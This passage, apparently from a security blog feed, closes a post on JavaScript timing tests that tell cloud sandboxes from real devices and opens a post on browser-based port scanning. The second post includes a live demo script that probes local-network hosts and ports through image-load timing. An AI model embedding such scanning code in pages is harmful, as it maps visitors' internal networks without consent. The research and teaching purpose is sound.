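<p>A single measurement is noisy, so in practice it makes sense to repeat both operations and compare robust statistics. The following sketch shows one possible way to do that with the median. The helper names <code>timeOperation</code>, <code>median</code> and <code>redpillRatio</code> are made up for this example, and the number of runs is an arbitrary choice.</p>

```javascript
// performance.now() exists in browsers and recent Node.js; fall back to Date.now().
function now() {
  return (typeof performance !== 'undefined') ? performance.now() : Date.now();
}

// Returns the wall clock time in milliseconds that one call of operation takes.
function timeOperation(operation) {
  var start = now();
  operation();
  return now() - start;
}

// Median of a list of numbers; does not modify the input array.
function median(values) {
  var sorted = values.slice().sort(function (a, b) { return a - b; });
  var mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 === 1 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Runs both operations `runs` times and returns median(diff) / median(base).
function redpillRatio(baselineOperation, differentialOperation, runs) {
  var baseTimes = [];
  var diffTimes = [];
  for (var i = 0; i < runs; i++) {
    baseTimes.push(timeOperation(baselineOperation));
    diffTimes.push(timeOperation(differentialOperation));
  }
  var base = median(baseTimes);
  // Guard against a zero baseline caused by coarse timer resolution.
  return base > 0 ? median(diffTimes) / base : NaN;
}
```

<p>A call such as <code>redpillRatio(memoryBaseline, consoleOperation, 50)</code> would combine two of the operations defined in the following sections. Which ratio separates cloud environments from normal devices is exactly the open question of this post, so no threshold is suggested here.</p>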
<h3>Baseline Operations</h3>
<p>The text baseline writes a random text into the DOM.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">textBaseline</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">addString</span> <span class="o">=</span> <span class="s2">"Writes lots of text:"</span>
<span class="nx">addString</span> <span class="o">+=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">()</span> <span class="o">*</span> <span class="mf">10000</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">pNode</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s2">"p"</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">pNode</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">500</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">pNode</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">pNode</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">+</span> <span class="nx">addString</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">baseStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">textBaseline</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">baseTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">baseStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'baseTime: '</span> <span class="o">+</span> <span class="nx">baseTime</span><span class="p">);</span>
</code></pre></div>
<p>The memory baseline pushes a random number onto an array <code>40000</code> times
and then removes every element again.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">memoryBaseline</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">RANDOM</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">()</span> <span class="o">*</span> <span class="mf">1000000</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">array</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Array</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">40000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">array</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="ow">new</span> <span class="nb">Number</span><span class="p">(</span><span class="nx">RANDOM</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">40000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">array</span><span class="p">.</span><span class="nx">pop</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">baseStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">memoryBaseline</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">baseTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">baseStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'baseTime: '</span> <span class="o">+</span> <span class="nx">baseTime</span><span class="p">);</span>
</code></pre></div>
<h3>Differential Operations</h3>
<p>The console write differential operation logs the same string to the console <code>2000</code> times.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">consoleOperation</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">error_str</span> <span class="o">=</span> <span class="s2">"Error: Writing to Console: "</span> <span class="o">+</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">()</span> <span class="o">*</span> <span class="mf">10000</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">2000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">error_str</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">diffStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">consoleOperation</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">diffTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">diffStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'diffTime: '</span> <span class="o">+</span> <span class="nx">diffTime</span><span class="p">);</span>
</code></pre></div>
<p>Local Storage Differential Operation</p>
<p>This operation writes a string of roughly 500 characters (495 fixed characters plus a few random digits) to local storage under 1000 different keys and then reads every entry back
into an array. It is assumed that this operation has different running times on different computers.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">localStorageOperation</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">randomStr</span> <span class="o">=</span> <span class="s2">"x"</span><span class="p">.</span><span class="nx">repeat</span><span class="p">(</span><span class="mf">495</span><span class="p">)</span> <span class="o">+</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">slice</span><span class="p">(</span><span class="mf">2</span><span class="p">,</span> <span class="mf">7</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">data</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Array</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">1000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">localStorage</span><span class="p">.</span><span class="nx">setItem</span><span class="p">(</span><span class="s1">'lsDO'</span> <span class="o">+</span> <span class="nx">i</span><span class="p">,</span> <span class="nx">randomStr</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">1000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">data</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="s1">'lsDO'</span> <span class="o">+</span> <span class="nx">i</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">diffStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">localStorageOperation</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">diffTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">diffStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'diffTime: '</span> <span class="o">+</span> <span class="nx">diffTime</span><span class="p">);</span>
</code></pre></div>
<p>ReadPixels Differential Operation (CPU - GPU Communication)</p>
<p>This algorithm tests the communication latency
between the CPU and the graphics card. It is assumed that generic cloud infrastructure
does not provide a GPU to each of its users. However, most normal users
have a GPU in their device. Therefore, it should be possible to observe clearly distinguishable run times.</p>
<p>Due to the size of this algorithm, it is <a href="https://bot.incolumitas.com/redpill/webgl.html">only linked here</a>.</p>
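<p>To give an idea of the principle, here is a heavily simplified sketch. It is not the linked implementation: the function name, canvas size and iteration count are assumptions made for illustration. It clears a WebGL canvas with a random color and reads the pixels back, which forces a round trip between CPU and GPU (or a software renderer if no GPU is present).</p>

```javascript
// Hypothetical, simplified read-back test. Returns the elapsed time in
// milliseconds, or null if WebGL is not available (for example outside a browser).
function readPixelsOperation(size, iterations) {
  if (typeof document === 'undefined') {
    return null;
  }
  var canvas = document.createElement('canvas');
  canvas.width = size;
  canvas.height = size;
  var gl = canvas.getContext('webgl');
  if (!gl) {
    return null;
  }
  // RGBA with one byte per channel: four bytes per pixel.
  var pixels = new Uint8Array(size * size * 4);
  var start = performance.now();
  for (var i = 0; i < iterations; i++) {
    gl.clearColor(Math.random(), Math.random(), Math.random(), 1.0);
    gl.clear(gl.COLOR_BUFFER_BIT);
    // Blocks until the rendered pixels have been copied back to the CPU.
    gl.readPixels(0, 0, size, size, gl.RGBA, gl.UNSIGNED_BYTE, pixels);
  }
  return performance.now() - start;
}
```

<p>In a browser, <code>readPixelsOperation(256, 100)</code> would yield one <code>diffTime</code> sample comparable to the other differential operations.</p>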
<h3>Visualization of Results</h3>
<script src="https://cdn.jsdelivr.net/npm/chart.js@2.8.0"></script>
<h4>Memory Baseline Operation</h4>
<canvas id="bl_memory" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Baseline Memory Local',
data: [
36.43499999998312, 17.12499999999295, 17.31000000000904,
19.140000000021473, 17.165000000005648, 17.6050000000032,
21.27500000000282, 19.634999999993852, 17.45499999998401,
19.34500000001549, 16.14000000000715, 16.91500000001156,
17.760000000009768, 17.380000000002838, 16.390000000001237,
14.525000000020327, 22.500000000007958, 20.6500000000176,
17.41000000001236, 22.305000000017117, 17.394999999993388,
17.19499999998675, 17.034999999992806, 18.585000000001628,
17.35999999999649, 18.660000000011223, 17.780000000016116,
18.124999999997726, 26.61000000000513, 14.90000000001146,
15.895000000000437, 17.77500000002874, 18.970000000024356,
19.054999999980282, 18.74499999996715, 15.405000000043856,
17.45499999998401, 19.099999999980355, 18.705000000011296,
16.675000000020646, 15.73999999999387, 21.00999999998976,
18.224999999972624, 18.190000000004147, 20.525000000020555,
17.56000000000313, 16.265000000032614, 16.25500000000102,
18.03499999999758, 18.020000000035452
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Baseline Memory AWS Lambda',
data: [
13.095000000248547, 8.78999999986263, 8.949999999458669,
12.715000000753207, 9.115000000747386, 9.425000000192085,
19.864999999981592, 8.724999999913052, 9.13500000001477,
11.300000000119326, 8.765000000039436, 17.25999999985106,
9.13500000001477, 10.854999999992287, 8.914999999888096,
9.360000000015134, 17.010000000027503, 8.964999999989232,
20.645000000058644, 8.885000000191212, 13.204999999970823,
9.434999999939464, 9.06499999996413, 8.935000000064974,
17.075000000204454, 17.014999999901192, 8.755000000064683,
8.619999999837091, 9.17499999991378, 8.765000000039436,
16.079999999874417, 8.835000000090076, 17.459999999800857,
12.999999999919964, 13.665000000173677, 8.95500000001448,
8.7149999999383, 9.149999999863212, 8.855000000039581,
9.310000000141372, 14.300000000048385, 13.12499999994543,
9.144999999989523, 9.02999999993881, 9.014999999862994,
9.270000000014988, 9.045000000014625, 12.759999999843785,
16.129999999975553, 9.90500000011707
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
],
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('bl_memory').getContext('2d');
new Chart(ctx, options);
</script>
<h4>Text Baseline Operation</h4>
<canvas id="bl_text" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Baseline Text Local',
data: [
42.11500000008073, 43.679999999994834, 41.200000000003456,
40.68500000005315, 45.10000000004766, 41.66999999995369,
43.13000000001921, 45.03499999998439, 47.60499999997592,
45.0149999999212, 42.34499999995478, 44.12000000002081,
40.93000000000302, 46.08500000006188, 43.895000000020445,
38.904999999999745, 42.45500000001812, 44.61000000003423,
41.18500000004133, 42.374999999992724, 43.8649999999825,
43.50499999998192, 43.32499999998163, 44.91500000005999,
43.03000000004431, 45.745000000010805, 44.80999999998403,
45.16999999998461, 43.400000000019645, 42.955000000006294,
46.49500000004991, 42.50999999999294, 40.56500000001506,
44.475000000034015, 44.90499999997155, 44.09999999995762,
42.53500000004351, 45.43499999999767, 43.43000000005759,
42.39499999994223, 44.089999999982865, 41.59000000004198,
46.06999999998607, 47.10499999998774, 42.430000000081236,
48.18000000000211, 44.510000000059335, 42.96999999996842,
43.97000000005846, 45.649999999909596
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Baseline Text AWS Lambda',
data: [
37.06499999998414, 35.89000000010856, 39.91500000006454,
39.90499999986241, 39.980000000014115, 43.83000000007087,
39.23999999983607, 41.23499999991509, 39.4699999999375,
42.519999999967695, 40.01499999981206, 37.794999999960055,
39.43500000013955, 41.245000000117216, 37.055000000009386,
44.55000000007203, 39.76999999986219, 39.760000000114815,
41.62499999983993, 39.49000000011438, 37.60499999998501,
40.59999999981301, 39.344999999912034, 41.434999999864885,
39.14000000008855, 39.729999999963184, 39.04499999998734,
39.5250000001397, 40.015000000039436, 39.879999999811844,
40.26500000009037, 35.55499999993117, 39.42000000006374,
40.1400000000649, 41.005000000041036, 39.060000000063155,
41.3300000000163, 43.435000000044965, 39.63500000008935,
39.95499999996355, 40.38500000001477, 39.80500000011489,
39.64999999993779, 42.374999999992724, 39.8649999999634,
35.60499999980493, 39.774999999963256, 35.95499999983076,
39.82500000006439, 34.795000000030996
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('bl_text').getContext('2d');
new Chart(ctx, options);
</script>
<h4>Console Differential Operation</h4>
<canvas id="do_console" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Differential Operation Console Local',
data: [
165.11000000002696, 154.6650000000227, 162.59999999999764,
177.55499999998392, 178.28499999995984, 165.11000000002696,
157.62999999992644, 165.31499999996413, 159.43000000004304,
153.81999999999607, 182.8249999999798, 157.6350000000275,
151.70499999999265, 163.01999999996042, 153.80000000004657,
153.13999999989392, 154.56499999993412, 152.85999999991873,
161.71999999994568, 162.93499999994765, 166.89999999994143,
152.48000000008233, 148.12500000005002, 161.64000000003398,
160.59000000007018, 162.30499999994663, 155.3399999999101,
159.84500000001844, 155.90499999996155, 149.13500000000113,
151.25000000000455, 170.18499999994674, 147.96000000001186,
157.48499999995147, 157.615000000078, 156.58499999995,
139.79500000004919, 154.3699999999717, 155.5749999999989,
143.5550000001058, 153.16999999981817, 150.71000000011736,
162.87499999998545, 161.70999999985725, 157.9300000000785,
164.3549999998868, 163.56499999983498, 157.4950000001536,
156.34000000000015, 153.7550000000465
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Differential Operation Console AWS Lambda',
data: [
280.05499999994754, 236.0200000000532, 272.27499999980864,
306.4050000000407, 237.0650000000296, 263.9000000001488,
206.92000000008193, 191.82500000010805, 280.94000000010055,
251.5600000001541, 251.96999999980108, 183.69499999994332,
261.7199999999684, 260.3750000000673, 192.5250000001597,
245.05999999996675, 130.85000000000946, 123.81500000014967,
207.2849999999562, 260.9099999999671, 178.47499999993488,
221.73500000008062, 250.30500000002576, 224.66999999983273,
240.76000000013664, 205.5249999998523, 246.75000000002,
206.9850000000315, 339.81500000004417, 272.23000000003594,
157.10500000000138, 204.81500000005326, 220.00499999990097,
166.55999999989035, 218.3599999998478, 161.90000000005966,
201.0400000001482, 225.19000000011147, 221.56500000005508,
136.72999999994317, 246.03000000001884, 182.9400000001442,
157.69999999997708, 297.7899999998499, 251.4099999998507,
226.83499999993728, 164.45500000008906, 152.4850000000697,
121.30000000024665, 271.9350000002123
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('do_console').getContext('2d');
new Chart(ctx, options);
</script>
<h4>Local Storage Differential Operation</h4>
<canvas id="do_localstorage" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Differential Operation Localstorage Local',
data: [
42.50000000001819, 46.99500000015178, 47.795000000178334,
54.47499999991123, 46.26500000017586, 47.15999999984888,
47.19000000000051, 50.50000000005639, 47.21500000005108,
52.86999999998443, 48.74499999982618, 38.105000000086875,
44.390000000021246, 47.410000000127184, 46.965000000000146,
49.38500000002932, 45.4650000001493, 46.13499999982196,
50.975000000107684, 45.54000000007363, 52.20499999995809,
45.74999999999818, 47.16499999994994, 48.54000000000269,
43.53999999989355, 49.18499999985215, 47.52499999995052,
47.09000000002561, 46.68500000002496, 48.2600000000275,
45.03500000009808, 47.480000000177824, 46.52000000010048,
54.575000000113505, 43.7050000000454, 52.79999999993379,
50.695000000132495, 49.854999999979555, 48.07499999992615,
49.409999999852516, 48.99000000000342, 47.12000000017724,
47.93499999982487, 51.120000000082655, 47.00500000012653,
54.694999999810534, 40.65500000001521, 45.22999999994681,
50.585000000182845, 44.64000000007218
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Differential Operation Localstorage AWS Lambda',
data: [
19.11500000005617, 21.079999999983556, 16.65000000002692,
20.10999999993146, 19.28000000020802, 18.71500000015658,
28.279999999995198, 19.170000000030996, 19.61499999993066,
19.054999999980282, 19.11500000005617, 19.594999999981155,
22.795000000087384, 19.244999999955326, 19.1899999999805,
19.21500000003107, 21.7649999999594, 21.58499999995911,
21.72500000006039, 21.869999999807987, 22.890000000188593,
27.434999999968568, 19.21500000003107, 20.009999999956563,
16.810000000077707, 21.989999999959764, 19.81999999998152,
19.1899999999805, 18.929999999954816, 19.880000000057407,
22.940000000062355, 22.085000000060973, 21.610000000009677,
19.534999999905267, 19.924999999830106, 22.590000000036525,
18.58999999990374, 17.119999999977153, 20.20000000015898,
21.140000000059445, 18.964999999980137, 18.90000000003056,
21.415000000160944, 20.430000000033033, 14.715000000023792,
23.519999999962238, 18.87999999985368, 21.08500000008462,
18.40500000002976, 19.489999999905194
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('do_localstorage').getContext('2d');
new Chart(ctx, options);
</script>
<h4>WebGL Differential Operation</h4>
<canvas id="do_webgl" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Differential Operation WebGL Local',
data: [
205.8599999999584, 164.30999999997198, 151.09999999999957,
166.5050000000008, 163.05000000002678, 141.15500000002612,
166.55500000003087, 159.93499999997596, 165.31499999999255,
156.6450000000117, 162.33999999997195, 193.82499999993286,
157.66999999995335, 196.544999999972, 174.0499999999372,
186.08499999997719, 154.7750000000434, 179.27000000000248,
131.03999999995608, 190.90499999998656, 146.65499999992448,
146.9950000000324, 173.29999999998336, 155.68500000017593,
159.53500000020426, 157.53000000006523, 175.3950000000657,
136.48999999992384, 169.66500000003748, 154.68500000014274,
161.88000000011016, 194.89999999981933, 170.10499999994977,
160.80999999996948, 168.57499999997572, 166.4449999999249,
180.7499999999891, 151.15000000000123, 169.2899999999895,
163.70000000006257, 182.30999999997266, 167.1150000000523,
162.94499999995082, 148.23499999982914, 176.09499999994682,
165.60000000012565, 167.57499999994252, 189.99000000007982,
167.17000000008397, 174.82999999998583
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Differential Operation WebGL AWS Lambda',
data: [
854.829999996582, 878.7300000003597, 873.0300000006537,
863.5950000025332, 866.7700000096374, 871.6849999982514,
867.2549999955663, 837.3700000047393, 879.4600000001083,
878.1399999988935, 860.7549999960611, 855.2949999957491,
868.0599999988772, 880.7199999955628, 860.8800000019983,
859.3499999988126, 864.4700000022567, 858.4999999948195,
857.7550000045449, 865.4550000082963, 842.7250000077038,
854.6750000041357, 853.7799999976414, 861.3900000127614,
862.1300000049814, 865.2100000035716, 853.7000000014814,
860.530000005383, 854.5000000030996, 850.7299999964744,
875.0750000017433, 845.565000005081, 852.9399999970337,
854.36499998832, 841.245000005074, 863.7799999942217,
870.0650000027963, 901.4749999987544, 868.7799999970593,
879.560000003039, 885.2350000015576, 860.0699999951757,
883.0899999975372, 842.4200000008568, 876.2749999950756,
863.1449999957113, 860.8500000027561, 867.0449999954144,
876.0250000050291, 866.150000008929
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
},
{
label: 'do_webgl phone',
data: [850, 836, 799, 804, 810, 859, 733, 896, 793, 799, 803, 821, 807, 779, 759, 724, 906,
726, 846, 833, 830, 778, 770, 842, 814, 804, 783, 829, 754, 914, 748, 817, 828, 812, 810],
borderWidth: 1,
borderColor: 'rgba(0, 0, 255, 0.3)',
},
]
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('do_webgl').getContext('2d');
new Chart(ctx, options);
</script>
<h3>Other Sources</h3>
<p><a href="https://news.ycombinator.com/item?id=20481291">Hacker News Discussion of other Red Pill techniques</a></p>Browser based Port Scanning with JavaScript2021-01-10T22:06:00+01:002021-01-10T22:06:00+01:00Nikolai Tschachertag:incolumitas.com,2021-01-10:/2021/01/10/browser-based-port-scanning/<p>In this article, various techniques to conduct port scanning from within the browser are developed. Modern JavaScript is used.</p><h2>Demo</h2>
<p>The demo below will port scan any host and port from within your local network.</p>
<div>
<input type="text" id="host" name="host" minlength="6" maxlength="50" value="localhost" style="padding: 3px">
<input type="text" id="port" name="port" minlength="2" maxlength="5" value="8888" style="padding: 3px">
<button id="portScan" onclick="startScan()" style="padding: 3px">Start Portscan</button>
<p id="portScanMeta" style="margin-top: 20px"></p>
</div>
<script>
// Author: Nikolai Tschacher
// tested on Chrome v86 on Ubuntu 18.04
var portIsOpen = function(hostToScan, portToScan, N) {
return new Promise((resolve, reject) => {
var portIsOpen = 'unknown';
var timePortImage = function(port) {
return new Promise((resolve, reject) => {
var t0 = performance.now()
// a random appendix to the URL to prevent caching
var random = Math.random().toString().replace('0.', '').slice(0, 7)
var img = new Image;
img.onerror = function() {
var elapsed = (performance.now() - t0)
// there is no socket to close here; report the elapsed time in milliseconds
resolve(parseFloat(elapsed.toFixed(3)))
}
img.src = "http://" + hostToScan + ":" + port + '/' + random + '.png'
})
}
const portClosed = 37857; // let's hope it's closed :D
(async () => {
var timingsOpen = [];
var timingsClosed = [];
for (var i = 0; i < N; i++) {
timingsOpen.push(await timePortImage(portToScan))
timingsClosed.push(await timePortImage(portClosed))
}
var sum = (arr) => arr.reduce((a, b) => a + b);
var sumOpen = sum(timingsOpen);
var sumClosed = sum(timingsClosed);
var test1 = sumOpen >= (sumClosed * 1.3);
var test2 = false;
var m = 0;
for (var i = 0; i < N; i++) {
if (timingsOpen[i] > timingsClosed[i]) {
m++;
}
}
// 80% of timings of open port must be larger than closed ports
test2 = (m >= Math.floor(0.8 * N));
portIsOpen = test1 && test2;
resolve([portIsOpen, m, sumOpen, sumClosed]);
})();
});
}
var startScan = function (event) {
var host = document.getElementById('host').value;
var port = document.getElementById('port').value;
var N = 30;
if (!['localhost', '127.0.0.1'].includes(host.trim())) {
N = 5;
}
portIsOpen(host, port, N).then((res) => {
let [isOpen, m, sumOpen, sumClosed] = res;
document.getElementById('portScanMeta').innerHTML = "m/N = " + m + "/" + N + ", sumOpen=" + sumOpen.toFixed(2) + ", sumClosed=" + sumClosed.toFixed(2) + " factor=" + (sumOpen/sumClosed).toFixed(2);
alert(host + ':' + port + ' is open: ' + isOpen);
})
}
</script>
<h3>Goal</h3>
<p>The goal of this article is to conduct port scanning with JavaScript. Various ports on the host <code>localhost</code> should be scanned. It is assumed that our origin is an <code>https</code> site, for example <code>https://incolumitas.com</code>.</p>
<p>An Ubuntu 18.04 Linux system with a recent Chrome browser is used (Chrome/86.0.4240.75).</p>
<p>Port scanning from within the browser <a href="https://news.ycombinator.com/item?id=23246170">recently caused quite some uproar</a> when a security researcher observed that eBay was port scanning his local network from within the browser. Here is another article that goes into <a href="https://blog.nem.ec/2020/05/24/ebay-port-scanning/">much more technical detail</a> than the previous one and tries to debug and reverse engineer the port scanning source code from the responsible company, ThreatMetrix.</p>
<p>However, browser port scanning has been known for much longer than that. In fact, as long as you can use JavaScript and there is no strict same origin policy, it will likely be possible.</p>
<h3>The Idea</h3>
<p>When creating a WebSocket object </p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:8888/"</span><span class="p">)</span>
</code></pre></div>
<p>that points to a local HTTP server started with the command <code>python -m http.server --bind 127.0.0.1 8888</code>, we get the following JavaScript error in the developer console:</p>
<div class="highlight"><pre><span></span><code>WebSocket connection to 'ws://127.0.0.1:8888/' failed:
Error during WebSocket handshake: Unexpected response code: 404
</code></pre></div>
<p>On the other hand, when creating a WebSocket object </p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:8889/"</span><span class="p">)</span>
</code></pre></div>
<p>with a URL that points to a non-existent service on port 8889, we get the following error in the developer console:</p>
<div class="highlight"><pre><span></span><code>WebSocket connection to 'ws://127.0.0.1:8889/' failed:
Error in connection establishment: net::ERR_CONNECTION_REFUSED
</code></pre></div>
